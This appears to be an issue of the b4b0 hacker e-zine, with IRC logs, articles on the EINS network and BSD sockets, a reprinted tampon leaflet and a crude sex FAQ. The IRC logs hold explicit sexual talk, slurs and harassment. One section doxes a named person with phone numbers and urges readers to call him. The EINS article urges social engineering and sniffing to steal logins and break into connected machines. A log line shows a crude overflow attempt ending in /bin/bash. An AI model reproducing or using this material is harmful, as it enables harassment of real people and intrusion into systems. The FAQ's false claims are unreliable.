[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] but u sound like a
very practical guy
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] quickie?:)
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] where?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats ur favorite
position?
[msg(bobbie)] any.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] min eis doggie
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u married?
[msg(bobbie)] why is it the doggie?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] its very erotic
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i think
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] and wild
[msg(bobbie)] u like to be ridden i take it.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :)
[msg(bobbie)] won't your bf mind if i took you for a ride?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] he wouldnt know
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] when did u have sex
last?
[msg(bobbie)] hmmm, last weekend.
[msg(bobbie)] so like, are you a nympho?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] with who?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] no im not
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] what is a nympho?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] im sure its somthing
bad
[msg(bobbie)] you're not 26.
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u there
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i got disconnected,
sorry
[msg(bobbi)] did you know i had a degree in pimpology?
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] there u go again
[msg(bobbi)] i wanna test it out on you in person.
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] have u ever gotten your
cock sucked>?
[msg(bobbi)] of course.
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] who sucked it?
[msg(bobbi)] it was the gf mistress.
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] your wife doesnt suck
ur cock?
[msg(bobbi)] no she sucks my friend's dick, however.
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] kewl
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] where do u like to cum?
[msg(bobbi)] you're one twisted fucker.
[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] may b eu should ask ur
mom to suck ur cock
[msg(bobbi)] maybe i'll stuff it in your face, beeoytch!
bobbi: No such nick/channel
RLoxley, showing lore the fear
¯ [msg(rlox1ey)] Send me some of your code.
ùìù #dragoon-x/option is idle.. out. (l/dX)
[RLox1ey(mageus@monet.bestweb.net)] child, there is more to life than just
code
[RLox1ey(mageus@monet.bestweb.net)] lets see you perform gyaku game ate?
[RLox1ey(mageus@monet.bestweb.net)] or perhaps some goshin jitsu
¯ [msg(RLox1ey)] ARE YOU STILL INTO LITTLE BOYS KENT?
¯ [msg(RLox1ey)] I'm like a n1nja and shit, fear.
[RLox1ey(mageus@monet.bestweb.net)] you cant??? guess that makes you lame
[RLox1ey(mageus@monet.bestweb.net)] goshin jitsu is not ninjitsu lamer
[RLox1ey(mageus@monet.bestweb.net)] it is an aikido kata
<module> hah
[RLox1ey(mageus@monet.bestweb.net)] what a cluebie
<module> what provoked him to say that lore
[RLox1ey(mageus@monet.bestweb.net)] HAHHAHAHAHAHAHAHAHAH
¯ [msg(RLox1ey)] I win.
[RLox1ey(mageus@monet.bestweb.net)] dreamer
[RLox1ey(mageus@monet.bestweb.net)] i have been TEACHING martial arts for
longer than you have been alive boy
[RLox1ey(mageus@monet.bestweb.net)] get a grip
¯ [msg(rlox1ey)] Okay, be at defcon.
[RLox1ey(mageus@monet.bestweb.net)] count on it
(lore) [RLox1ey(mageus@monet.bestweb.net)] i have been TEACHING martial
arts for
(lore) longer than you have been alive boy
(lore) OH MY GOD
(lore) HEZ GONNA KARATE CHOP ME
<spiked> LOL!
<spiked> LMAO
[RLox1ey(mageus@monet.bestweb.net)] there will be no fight lore, only your
slaughter
[RLox1ey(mageus@monet.bestweb.net)] grow up
ùìù #comtech/Optik9 is away: (Auto-Away after 10 mins) [BX-MsgLog On]
<spiked> he teaches people martial arts on eye are cee@$#%
¯ [msg(RLox1ey)] CHICKEN
¯ [msg(RLox1ey)] BORK BORK BORK
(lore) ¯ [msg(rlox1ey)] Okay, be at defcon.
(lore) ¯ [msg(RLox1ey)] We'll see who has the most fighting skill.
(lore) [RLox1ey(mageus@monet.bestweb.net)] there will be no fight lore,
only your
(lore) slaughter
(lore) ¯ [msg(RLox1ey)] CHICKEN
(lore) ¯ [msg(RLox1ey)] BORK BORK BORK
[RLox1ey(mageus@monet.bestweb.net)] and realize that people have different
strengths
ð spiked/#HiSec signs up for Karate class - ONLINE!
(lore) Spiked, heh.
[RLox1ey(mageus@monet.bestweb.net)] guess you cant read either
¯ [msg(rlox1ey)] <spiked> he teaches people martial arts on eye are
cee@$#%
[dcc(n1nja-x)] [09:30] B:1 C:#comtech AC:2 S:8
CS:dallas.tx.us.undernet.org:6667
<spiked> he is always there and never out$#% how can he teach shit?
¯ [msg(RLox1ey)] ð spiked/#HiSec signs up for Karate class - ONLINE!
¯ [msg(RLox1ey)] <spiked> he is always there and never out$#% how can he
teach shit?
[dcc(l-n1nja)] [12:30] B:1 C:#comtech AC:2 S:7
CS:Baltimore.MD.US.Undernet.Org:6661
(lore) Heh.
[RLox1ey(mageus@monet.bestweb.net)] so silly
[RLox1ey(mageus@monet.bestweb.net)] just cause i am connected doesnt mean
i am here
(lore) [RLox1ey(mageus@monet.bestweb.net)] just cause i am connected
doesnt
mean i am
(lore) here
(lore) YEAH
[RLox1ey(mageus@monet.bestweb.net)] guess you all are too lame to realize that
(lore) RIGHT
[RLox1ey(mageus@monet.bestweb.net)] goodbye
[RLox1ey(mageus@monet.bestweb.net)] *_(ignored)_*
¯ [msg(RLox1ey)] Were pissing ourselves in #hisec
<spiked> ..(msg[rlox1ey]) yoh. can i sign up for some of those online
karate classes?
¯ [msg(RLox1ey)] Don't go!
. . .
-> *lordrage* Have you been drinking again?
<lordrage> iM Noetrg fuvjing druncrk
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 6 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
Welcome to the Idiot of Month
this issues winner ****> Bronc Buster
first name - eric
phone - 530-674-1736
girlfriend, Joy 530-755-2557
We were going to give him a plaque, but due
to his lack of skill and our lack of money, it's
probably not going to happen.
give him a call for b4b0!@
(p.s. tell him your korean and you eat horses)
(also, tell him you'll cut his hair at defcon)
*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus
so1o:
name - Chris Evans
Undergraduate student of Lady Maggaret Hall, Oxford
*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus
. . .
*nosilA* does this work?
CTCP from nosilA: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA/bin/bash
-> *nosila* I don't think so.
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 7 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
Tampax Dox
Gary Gnu
Before you start.....
Relax and take your time. If you're tense, your muscles will tighten =
up. When you're relaxed, the tampon slides in without any resistance. =
Wash your hands. Next, find the position that's comfortable to you. =
Most women either sit on the toilet with knees apart, squat slightly =
with knees bent and far apart, or stand with one foot on the toilet =
seat. Remove the tampon from the wrapper. Make sure the removal cord =
is hanging outside the smaller inner tube. Now you're ready to follow =
these easy instructions...
Avant de commencer....
Detendes-vous et prenez votre temps. Si vous etes tendue, vos muscles =
se contracteront. Par contre, si vous etes detendue, le tampon =
s'inserera sans difficulte. Lavez-vous les mains, puis adoptez une =
position dans laquelle vous vous sentez a l'aise. La plupart des femmes =
s'assoient sur le siege des toilettes en ecartant les genoux, ou =
s'accroupissent legerement en ecartant les jambes ou encore se tiennent, =
debout acec un pied sur le siege des toilettes. Retirez le tampon de =
l'enveloppe. Assurez-vous que le cordonnet de retrait depasse bien du =
plus petit tube de l'applicateur. Maintenant, vous etes prete a lire =
ces instructions faciles a suivre...
Figure 1.1 Tampax Tampon=20
=20
Inner Pusher Tube
Tube interieur pour pousser
|
| _ Round Tip
| _________________________________ / Bout = arrondi
_____________|||| _______________________|_ /
| ||| | | =20
--------------------------------| |
| |______________||| |_________________________|
| \ ||||______________________________|
| \ =20
Removal Cord \_ Grooved Finger Grip |
Cordonnet de retrait Anneaux stries |
|
Outer Insertion Tube
Tube exterieur d'insertion
The right way to use TAMPAX tampons
- Always remove your used tampons before inserting a new one.
- Be sure to remove the last tampon you use at the end of your period.
- Use the lowest absorbency tampon for your flow.
- Change your tampon every 4-8 hours, as needed.
- TAMPAX Tampons can be worn up to 8 hours during the day or at night.
- Tampons are to be used during menstruation only - never between =
periods.
La bonne facon d'utiliser les tampons TAMPAX
- Retirez toujours le tampon utilise avant d'en inserer un autre.
- N'oubliez pas de retirer le dernier tampon a la fin de vos =
menstruations.
- Utilisez le plus faible degre d'absorption pour votre flux.
- Changez de tampon toutes les 4 a 8 heures au maximum, de jour comme de =
nuit.
- Les tampons ne s'utilisent que pendant les menstruations, jamais entre =
celles-ci.
Helpful Hints About Absorbency
Every woman has her own unique menstrual flow, which can vary from month =
to month and from day to day. As you learn your own flow, you'll find =
that it may be heavier at the start of your period and lighter toward =
the end. You should evaluate your flow and select the tampon with the =
minimum absorbency to meet your needs. You can get the best protection =
and the most comfort by choosing different absorbencies during your =
period. You may want to use different tampon absorbencies for different =
days of your menstrual period. Make sure that you always use the lowest =
absorbency to meet your needs. =20
Conseils utiles sur le degre d'absorption
Toutes les femmes ont menstruel different, qui peut varier d'un mois sur =
l'autre et d'un jour a l'autre. Au fur et a mesure que vous vous =
habituerez a votre propre flux menstruel, vous vous rendrez peut-etre =
compte qu'il est plus abondant au debut des regles et plus leger a la =
fin. Vous devriez evaluer votre flux et choisir le tampon offrant le =
degre d'absorption le plus faible qui correspond a vos besoind. Pour =
obtenir la meilleure protection et le plus de comfort possible, =
choisissez des tampons aux differents degres d'absorption pour les =
differents jours de vos menstruations. Utilisez toujours le degre =
d'absorption le plus faible qui convient le mieux a vos besoind.
Figure 1.2 Tampon Absorbency Chart (English Version)
LIGHT LIGHT TO MEDIUM
- Lites Junior Absorbency - Slender Regular Absorency
- Regular Absorbency
MEDIUM TO HEAVY VERY HEAVY
- Super Absorbency - Super Plus Absorbency =
=20
(Version Francais)
LEGER LEGER A MOYEN
- Degre d'absorption Junior - Extra-mince, degre =
d'absorption =20
Regulier
- Degre d'absorption =
Regulier
MOYEN A ABONDANT TRES ABONDANT
- Degre d'absorption Super - Degre d'absorption Super =
Plus
How to insert a TAMPAX tampon
Comment inserer un tampon TAMPAX
1) With one hand, hold the applicator by placing your thumb and middle =
finger on the finger grip rings. Hold the applicator so the tip is =
pointing toward you.
D'une main, saisisse l'applicateur entre le pouce et le majeur, a la =
hauteur des anneaux stres. Tenez l'applicateur de facon a ce que le =
bout soit pointe vers vous.
2) With your other hand, gently spread the skin outside your vagina. =
Insert the tip of the applicator into the vaginal opening. Point the =
tip toward your lower back and relax your muscles.
De l'autre main, ecartez delicatement la peau entourant l'orifice =
vaginal. Inserez le bout de l'applicateur dans l'ouverture du vagin en =
l'inclinant vens le bas des reins et relacher vos muscles.
3) Gently slide the applicator into the vagina. It will easily follow =
the path of the vagina, which angles up and slightly toward your lower =
back. If the applicator doesn't slide in easily, gently rotate (turn) =
it to the right or left as you push.
Inserez delicatement l'applicateur dans le vagin. Il suivra facilement =
la courbe du vagin, qui marque un leger angle vers la baz du dos. Si =
l'applicateur ne s'insere pas facilement, tournez-le doucement vers la
droite ou vers la gauche en le poussant.
4) Insert the applicator up to the finger-grip rings until your fingers =
touch your body. With your index finger, push the inner tube all the =
way into the outer tubes. Or use your other hand to push in the inner =
tube. One tube is now inside the other.
Inserez l'applicateur jusqu'a ce que vos doigts touchent votre corps, =
c'est-a-dire jusqu'aux anneaux stres. Avec l'lindex poussez =
completement le tube interieur dans le tube exterieur ou, si vous =
preferez, utilisez l'autre main pour pousser le tube interieur. Un tube =
se trouve maintenant dans l'autre.
5) Remove both tubes. If your tampon has a CARDBOARD APPLICATOR. IT =
CAN BE FLUSHED. However, if your tampon has a PLASTIC APPLICATOR, DO =
NOT FLUSH IT but dispose of it in a waste receptacle. The tampon should =
now be comfortably inside you with the removal cord hanging outside your =
body. When a TAMPAX tampon is inserted properly, you shouldn't feel any =
discomfort. If you feel uncomfortable, the tampon may not be placed far =
enough inside. If this occurs, just remove the tampon and try again =
with a new one.=20
Retirez les deux tubes. SI L'APPLICATEUR EST UN CARTON, VOUS POUVEZ LE =
JETER DANS LES TOILETTES. Cependant, SI L'APPLICATEUR EST EN PLASTIQUE, =
jetez-le directement a la poubelle ET NON DANS LES TOILETTES. Le tampon =
devrait maintenant etre bien en place et le cordonnet devrait pendre a =
l'exterieur de votre corps. Lorsqu'un tampon TAMPAX est correctement =
insere, vous ne le sentirez pas. Si vous ne vous sentez pas a l'aise, =
c'est que vous n'avez pas insere le tampon assez loin. Le cas echeant, =
retirez le tampon et inserez-en un autre.
To remove your TAMPAX tampon
Sit on the toilet with knees apart, or squat slightly. Keeping your =
muscles relaxed, pull the cord gently and steadily downward at the same =
angle you used to insert the tampon. Then simply flush the tampon away.
Comment retirer un tampon TAMPAX
Assayez-vous sur le siege des toilettes les genoux ecartes ou =
accroupissez-vois legerement. Relachez les muscles en tirez =
delicatement mais fermement sur le cordonnet dans le meme angle que vous =
avez utilise pour l'inserer. Puis jetez simplement le tampon dans les =
toilettes.
For a free TAMPAX sample go to:
http://tampax.com/cgi-bin/suite/sample/freeform.cgi?country=3Dus
Questions: Call 1-800-523-0014
Questions: appelez le 1-800-5230014
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 8 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
EINS and the z39.50 Protocol Suite.
<gr1p@b4b0.org>
Please Excuse any mistakes, I wrote this when stoned.
Werd to dgm for letting me use his computer and smoking with me. :>
--> What is EINS?
EINS, or European Information Network Services exists to provide the
transport of data services to scientific and technological research
centres across Europe, including the European Space Agency (ESA). EINS is
technically a series of interlinked information servers linked together to
ensure distribution and availiability of research data.
EINS is networked using a gateway designed by the ESA called the MIRO
Gateway, this uses and basically enhances the Z39.50 protocol suite for
information retrival.
--> Z39.50 protocol
The z39.50 Protocol Suite is probably one of the best Protocol suites for
Information Retrival to be used on a research scale. The main reason
behind this is that the z39.50 protocol suite incorporates many other
protocols into its own suite, allowing co-existence between many protocols
for data-retrival and posting. Today it is commonly used among the
large and more famous Libraries for exchange of bibliographical data as
well as establishments already stated.
The z39.50 protocol suite works on the basis of TCP/IP which is used for
the Internet. Any network encorporating TCP/IP can provide a means of
transport for a machine using the z39.50 protocol.
The z39.50 protocol has a number of services defined within the protocol
which users can make use of.
- Initialisation Service
This sets up connections ready for data transfer.
- Search Service
This enables the user to search for data on machines connected using
z39.50, This service also deals with the relaying of data and sorting of
search resuls.
- Present Service
This is a definition of the Search Service for how much data is to be
transferred, and in what order etc.
- Access Control
This exists as the protocol's main security control, deals with login
passwords, copyright of data etc.
- Resource Control
Although this service is not always used, it acts as supervision, ie. an
admin can restrict which data resources users have access to and download
rates etc. This is mainly used in Academic Establishments where large
amounts of users requires tighter control of resources.
- Delete Service
This service exists to allow users access to delete records.
- Extended Services
Extended services include the 'help' facility which can guide users on how
to operate the search facilities etc.
The z39.50 protocol as used in EINS is slightly different than the
original RFC draft for the implementation of the z39.50 protocol suite,
although this original draft has now evolved into EINS as this is the
primary network encorporating z39.50.
EINS uses the MIRO gateway to transfer data on top of the original z39.50
protocol. More about the MIRO Gateway can be found in the next section.
--> MIRO Gateway
The MIRO Gateway is used in EINS to interlink several European Information
Service Networks and encorporating them all into one network using the
MIRO Gateway. It makes it possible for users of any of the network
services to access databases and other networked information.
The advantages of the EINS, and the reason for its popularity among
scientific and academic research establishments is that, because of the
MIRO Gateway, the best information networks are linked into one resulting
in far more data from different networks being made availiable for the
users.
Fig. 1 below helps demonstrate the network architecture of EINS under the
MIRO Gateway. I have broken the diagram into 5 sections, labelled 1-5 for
ease of explanation.
- Fig 1. - MIRO System Architecture
----- ----- ----------
- 1 - | ERN | | PSN | | Internet |
----- ----- ----------
\ | /
\ | /
\ | /
\ | /
\ | /
\ | /
\ | /
\ | /
\ | /
\ | /
\ | /
\ | /
|
|
--------------
- 2 - | MIRO Gateway |
--------------
|
|
|
---------------
- 3 - | Origin Server |
---------------
|
|
-----------------
| |
- 4 - | Z39.50 Protocol |
| |
-----------------
/ | \
/ | \
/ | \
/ | \
/ | \
/ | \
/ | \
/ | \
------------- ------------- -------------
- 5 -| MIRO Target | | MIRO Target | | MIRO Target |
------------- ------------- -------------
1 - This layer shows the original networks used to compile the data of
EINS.
ERN - European Research Networks, used for data transfer between
Academic, Technological and Scientific Establishments.
PSN - Packet Switching Networks, such as GNS Dialplus, Sprintnet,
JANET, and other European/International networks, usually
encorporating the x.25 protocol.
Internet - The final network for data collection. The Internet, with
vast amounts of data for research use (the most favoured
network nowadays).
2 - The MIRO Gateway acts as a sort of proxy to allow users access EINS to
gather Information from the networks discussed in Section 1 of the
diagram.
The MIRO Gateway builds in efficient data collecting techniques,
developed by The European Space Agency (who themselves are connected
to EINS). It uses a transparent command language to ease output
formatting, and access accounting.
3 - The origin server is the primary machine used in the EINS. It is of
course named, EINS, and it is this machine that is accessed for
entry to the data and records stored on EINS.
4 - From this section of the diagram, the network flow turns direction,
as machines accessing EINS or, as labelled on the diagram, The Origin
Server use z39.50 to access the public data and search through it with
ease. Look under the 'z39.50 Protocol' section for more information
on how the z39.50 protocol operates.
5 - MIRO Targets are simply the machines accessing EINS requesting data
transfer/recieval.
--> Accessing EINS
There are actually quite a few ways to access EINS. As EINS gathers
information from so many sources, it has network compatibility with so
many different protocols therefore allowing access from so many different
networks.
- Firstly, and formost, EINS is accessable via telnet. Although I have
never personally accessed via telnet it is availiable to users at the
address telnet.eins.org although this may be rather slow.
- EINS is also connected to GNS Dialplus, a .uk network encorporating
the x.25 protocol. GNS Dialplus is, in my opinion, a more safer way to
access EINS if you are doing anything naughty, although I am not saying
you should. :>
However, access to GNS Dialplus is probably only useful if you are in
the United Kingdom. Here are some access numbers for GNS Dialplus for
you lovely Brits:-
London ------> 0181 810 5576
Manchester --> 0161 834 4543
Birmingham --> 0121 643 6521
Bristol -----> 0117 929 3772
Glasgow -----> 0141 221 5851
Leeds -------> 0113 245 8213
Edinburgh ---> 0131 313 3721
Cambridge ---> 01223 844 597
Reading -----> 01734 394 452
EINS is located on GNS Dialplus as the address EINS-QUEST and takes you
to exactly the same machine as telnet.eins.org does (naturally).
- Access to EINS is also possible via Sprintnet on the NUA 022226410174,
although I have personally never tried this NUA I am told that it is
valid for access to EINS.
There are many other ways to access EINS via networks around Europe and
The World, I guess the best idea is to scan for them. Try looking around
JANET for a gateway perhaps.
--> Exploring EINS
To explore EINS you will need an account on the system to access the data.
Try your basic social engineering techniques to gain accounts, or find a
machine using EINS and sniff the traffic on the machine using a packet
sniffer tool, the possiblities are endless, you're the hacker, figure it
out.
Upon connection to EINS, however you choose to connect, you will be presented
with a login screen, asking you to enter your valid QUEST-ID. This is you
authentication code to gain access to EINS. So go be a hacker and get
some kodes. :>
To explore EINS to its maximum potential it will be very useful (essential
even) to know the basic simple commands for navigating EINS. The commands
used in EINS are abbreviations of words, and enable you to take complete
control over your time navigating EINS. Below is a list of the commands,
along with uses and definitions. This command list was adapted from the EINS
command list found in The British Library.
1 - Entering Files.
- BEGIN
This command is used to begin searching the EINS. It kills any previously
open search process and starts fresh. The abbreviation for this command
is simply the letter 'b'.
eg. B hack
This command line would open a new query file recorded as 'hack'.
2 - Searching
- SELECT
This command enables you, the user, to define search strings, limit your
search results etc.
eg. S space
This command line would set search select on topics involving space.
eg. S 2/98-99
This command line would limit data search for files created between 2/98
and 2/99.
- EXPAND
The Expand command enables you to expand you search strings and pull more
data from relative places.
eg. E space
This command line would expand on the search results found in the string
space.
- DELETE
The Delete command enables the user to delete specific search sets.
eg. DELETE ALL
THis command line would delete all open search files.
3 - Looking at References
- PRINT
The Print command enables you to send search references to a specified email
address.
eg. PR kodez EMAIL=gr1p@b4b0.org
The above command would send the search reference data called kodez to
gr1p@b4b0.org.
- DOWNLOAD
This command would allow you to save search references to a file on your
machine.
eg. DL zerodayz /home/gr1p/zero.txt
The above command will save search reference 'zerodayz' output to
/home/gr1p/zero.txt.
- SAVE
The alternativ
to the download command is SAVE. Both provide the same
function to the user, although download seem's to be prefered for more
portable saving options.
eg. SAVE hacker
This would simply save the search reference list 'hacker' to your 'search
favourites' list.
4 - Other Commands
- HELP
Help is provided as part of EINS. THis will enable you to grasp much
greater control over the commands in use of EINS. It is recommended
that HELP is looked at when in doubt.
eg. HELP <COMMAND>
Will give you help on how to make greatest use of the command.
- LOGOFF
Logoff simply log's you off your EINS session.
eg. LOGOFF
--> End
You may be asking, "what use does this have for me, the typical network
hacker?"
Well, the answer is simple, because of the large amount of data networks
linked to form EINS, there are a large amount of machines, many of these
machines will have poor security, world-readable/writable files, password
information in readable files etc. You could even do searches for open
x.25 gateways, access numbers to networks etc. The possiblities are
endless and from this information you could gain entry to numerous
machines connected to networks worldwide.
Although I am in no way condeming the use of EINS as a gateway to other
networks, nor am I saying I have done it, I am simply suggesting
possiblities. :>
gr1p@b4b0.org
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 9 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
Intro To *BSD Socket Layer Internals
by jayenz
the socket layer deals with IPC at the system. the network subsystem
is generally divided into 3 layers: transport, network, and
network-interface layer. the layers are respective to the transport,
network, and link layers of the OSI model. data is received at the
network interface and is moved up the layers until it is placed in a
recieve queue for the dest socket. primary focus is put on the socket
layer workings. all examples done from a NetBSD box, so some things may
not be the same for linux (specifically the Mbuf stuff, check out
<linux/skbuff.h>).
the highest layer of the network subsystem, the transport layer or
socket layer, works by using what is called a "socket data structure"
that is loaded dynamically by malloc(). socket data structures take the
following form (from <sys/socketvar.h>):
---`BEGIN CODE`---
struct socket {
short so_type; /* generic type, seesocket.h*/
short so_options; /* from socket call,seesocket.h*/
short so_linger; /* time to linger while closing*/
short so_state; /* internal state flags SS_*,
below */
void *so_pcb; /* protocol control block */
struct protosw *so_proto; /* protocol handle */
/*
* Variables for connection queueing.
* Socket where accepts occur is so_head in all subsidiary sockets.
* If so_head is 0, socket is not related to an accept.
* For head socket so_q0 queues partially completed connections,
* while so_q is a queue of connections ready to be accepted.
* If a connection is aborted and it has so_head set, then
* it has to be pulled out of either so_q0 or so_q.
* We allow connections to queue up based on current queue lengths
* and limit on number of queued connections for this socket.
*/
struct socket *so_head; /* back pointer to acceptsocket*/
struct soqhead *so_onq; /* queue (q or q0) that we'reon*/
struct soqhead so_q0; /* queue of partial connections*/
struct soqhead so_q; /* queue of incomingconnections*/
TAILQ_ENTRY(socket) so_qe; /* our queue entry (q or q0) */
short so_q0len; /* partials on so_q0 */
short so_qlen; /* number of connections onso_q*/
short so_qlimit; /* max number queuedconnections*/
short so_timeo; /* connection timeout */
u_short so_error; /* error affecting connection */
pid_t so_pgid; /* pgid for signals */
u_long so_oobmark; /* chars to oob mark */
/*
* Variables for socket buffering.
*/
struct sockbuf {
u_long sb_cc; /* actual chars in buffer */
u_long sb_hiwat; /* max actual char count */
u_long sb_mbcnt; /* chars of mbufs used */
u_long sb_mbmax; /* max chars of mbufs to use */
long sb_lowat; /* low water mark */
struct mbuf *sb_mb; /* the mbuf chain */
struct selinfo sb_sel; /* process selecting
read/write */
short sb_flags; /* flags, see below */
short sb_timeo; /* timeout for read/write */
} so_rcv, so_snd;
};
---`END CODE`--
as you can blatantly see, there are structs for both the send and
recieve buffers. a socket data structure is setup when socket(2) is
called. After it is called, the member caddr_t f_data; /* vnode or
socket */ of the kernel descriptor table struct (<sys/file.h>) points
to the socket structure. this is somewhat parallel to the vnode struct
that is used with filesystems.
NOTE: the "so" prefix the struct members is used to denote its a
second-level routine. i.e. sobind(), solisten().
ok.
the data is stored in the sockbuf queue as a chain of mbufs (mbufs
covered later). data enters the system via systems calls like send(),
and is passed as a chain of mbufs to be sent outward over the interface.
data recieved is passed to the socket layer in mbuf
chains where they are held until requested. hi and low watermarks are
used to control the flow of data. these watermarks control the
operation of the select(2) sytem call for testing whether the socket is
ready for reading and writing. the socket data structure must maintain
the queues of messages being sent and received by the socket. mbufs take
care of this.
The separate queues for incoming and outgoing messages are stored in
their own data structures called "Mbufs". the Mbuf data structures
generally take the following form:
struct mbuf {
struct m_hdr m_hdr;
union {
struct {
struct pkthdr MH_pkthdr; /* M_PKTHDR set
*/
union {
struct m_ext MH_ext; /* M_EXT set */
char MH_databuf[MHLEN];
} MH_dat;
} MH;
char M_databuf[MLEN]; /* !M_PKTHDR,
!M_EXT */
} M_dat;
};
[...]
struct m_hdr {
struct mbuf *mh_next; /* next buffer in chain */
struct mbuf *mh_nextpkt; /* next chain inqueue/record*/
caddr_t mh_data; /* location of data */
int mh_len; /* amount of data inthismbuf*/
short mh_type; /* type of data in this mbuf*/
short mh_flags; /* flags; see below */
};
Mbufs are 128 bytes long and use 100-108 bytes specifically used for
data storage. Messages read over the socket can be stored in a single
mbuf structure under the conditions that message <= 108 bytes. If not
(blargh), you can use an external mbuf cluster for the rest of the data.
operation of socket layer in associating two processes
a foreign client starts an active open, and the server will passively
accept connections. the sockets are created by users with the socket(2)
system call, and created internally by the socreate() routine. the
socreate() routine allocates the space for the socket data structure
talked about above. after socreate(), the address is bound internally
by the sobind() routine. if the protocol isnt a connectionless one, a
PRU_LISTEN request is sent the protocols to set the backlog on the
socket. to now accept connections, accept() must
be called which internally invokes the soaccept() routine.
on the client side, an soconnect() is done internally for the regular
connect() to establish a connection. this inturn sends a PRU_CONNECT
request to the protocol. after the initial soconnect(), an
soisconnecting() is issued to initiate the 3-way handshake if we are
dealing with tcp.
after the connection has been established, data must be transfered.
sosend() is used internally to copy data from the process's addess space
in to the mbufs. afterwords it is moved down through other layers and
sent outwards on the interface. on recieving the sent data, it is sent
to the remote interface, up the different layers with each layer taking
off its own header, i.e( IP, TCP headers). the data is then copied onto
the socket's input queue (in our case so_rcv, see above). after on the
queue, the sorecieve() routine can copy the data out to be read by the
read() syscall.
termination
to end the communication between the two sockets, the soshutdown()
routine is called. this will flush the recieve buffer and mark the
socket as not able to recieve anymore data. A PRU_SHUTDOWN request is
sent to the protocol. the connection is now dead.
this was just a brief intro, if you want more info go get a book
-jayenz
(modu1e@hotmail.com)
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 10 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
Possibly, the stupidest thing we've
ever gotten. Enjoy.
ResiD@home.com
fjear sperm .
----------------------------- CUT HERE ------------------------------
---------------------------------------------------------------------
Masturbation FAQ
- R e s i D -
---------------------------------------------------------------------
Table of Contents:
Q and A
-------
1.1 - Why Masturbate?
1.2 - What if I get caught?
1.3 - Is ResiD a Pervert?
1.4 - How Can I be the best Maturbater I can be?
1.5 - If I masturbate, would the size of my penis increase?
1.6 - Is it normal to masterbate?
1.7 - Is masturbation a sin?
Tips
----
2.1 - Some tips to keep clean.
---------------------------------------------------------------------
Q and A:
1.1 - Why Masturbate?
Masturbation isn't something that is just plain old nasty, it's
great for relieving stress and such.
1.2 - What if I get caught?
Well.. If you get caught, your might end up in a mental
institution, but there are many ways for one to prevent getting
caught. Locking the door or blocking it with a chair would be my
recommendation.
1.3 - Is ResiD a pervert?
Yes.
1.4 - How Can I be the best Masturbater I can be?
Masturbation is a "sport" (as I like to call it) much like any
other. They all take determination. If you wanna be the best you
can be, then I suggest you unzip them levis and start whackin'
1.5 - If I masturbate, would the size of my penis increase?
My Father told me so.
1.6 - Is it normal to masturbate?
Yes.. It is more then normal. I think very highly of whackers.
a small servey was done in 95 about Masterbation. The results
were outstanding! it seems that 70% of all females at the age of 18
have tried Masturbation atleast once, and 90% of all males at the
age of 18 have tried masturbation atleast once.
1.7 - Is Masturbation a sin?
No, Masterbaters are loved by the world.
--------------------------------------------------------------------------
Tips:
1: Before you are about to bl0w your load.. try putting a sock over
your penis, you will be suprised at the results. Your hands will
be absolutly cumless.
2: If your one of those guys that like to please the laddies, or just
like to Masterbate for a long time, stop before your about to
blow your load, then start again after about 10 seconds.
if you don't know what to do between that 10 second time period,
try kissing the girl or start on da titties.
--------------------------------------------------------------------------
Kisses to: | Comment
b4b0 [www.b4b0.org] #b4b0 / efnet
loophole [www.loophole.org] #Main /
chrome.unixgeeks.com
dr0z the Crack Baby [www.bitched.blinx.net]
Kan "Unknown Protocols"
XeXeN "BioDigital rocks j0r nUtz"
worms "It was like that when I got here"
sreality "Everyones a niggah"
miah "*** ResiD has quit IRC (Killed (miah (fuck you
die))"
My Girlfriend (Whatever her name is)
rootshell "What would I do wiffout you?"
PhrznCorpz (Female) "shitty"
Disses to:
